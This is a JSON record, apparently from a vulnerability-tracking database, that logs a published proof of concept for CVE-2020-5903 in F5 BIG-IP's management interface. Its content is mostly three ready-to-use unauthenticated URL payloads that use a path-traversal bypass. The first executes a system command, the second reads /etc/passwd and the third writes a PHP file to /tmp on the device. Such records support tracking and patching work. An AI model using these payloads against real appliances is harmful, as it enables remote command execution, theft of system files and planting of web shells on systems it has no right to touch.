{"uuid": "0227573c-0d81-4f0a-b7d8-61aa53db511b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-5903", "type": "published-proof-of-concept", "source": "https://t.me/cKure/1145", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Exploit code for F5's BIG-IP; TMUI Unauthenticated RCE vulnerability via HTTP GET requests | CVE-2020-5903\n\n\u25aa\ufe0eCode Execution\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami\n\n\u25aa\ufe0eLFI\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\n\n\u25aa\ufe0eFile Write\nhttps://\u300aIP\u300b/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/cmd.php&content=thisisgood", "creation_timestamp": "2020-07-06T11:05:19.000000Z"}